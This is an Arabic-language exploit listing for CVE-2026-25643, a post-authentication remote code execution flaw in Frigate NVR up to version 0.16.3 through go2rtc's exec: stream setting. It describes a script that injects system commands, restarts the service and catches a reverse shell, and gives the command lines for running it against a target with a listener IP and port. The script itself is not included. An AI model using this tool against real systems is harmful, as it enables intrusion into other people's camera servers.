
إكسبلويت لثغرة RCE المُصادَق عليها في Frigate NVR عبر go2rtc exec: حقن البروتوكول، وأتمتة تنفيذ أوامر النظام، والتقاط قشرة عكسية.
عنوان الاستغلال: Frigate NVR <= 0.16.3 - تنفيذ التعليمات البرمجية عن بُعد
بعد المصادقة
التاريخ: 2026-02-05
مؤلف الاستغلال: jduardo2704
الصفحة الرئيسية للبائع: https://frigate.video/
رابط البرنامج: https://github.com/blakeblackshear/frigate
الإصدار: <= 0.16.3
CVE: CVE-2026-25643
النشرة الأمنية: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
إصدارات Frigate حتى 0.16.3 معرّضة لتنفيذ التعليمات البرمجية عن بُعد (RCE) عبر إعداد go2rtc. يمكن للمهاجم الذي يمتلك وصولًا مصادقًا عليه (أو بدون مصادقة إذا كان المثيل مكشوفًا) حقن أوامر النظام في إعداد البث باستخدام بروتوكول exec:. يقوم هذا الاستغلال بأتمتة حقن الحمولة، ويعيد تشغيل الخدمة، ويلتقط الصدفة العكسية.
pip install requests pyyaml
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
هذا السكربت مخصص للأغراض التعليمية وللاختبارات الأمنية المصرح بها فقط.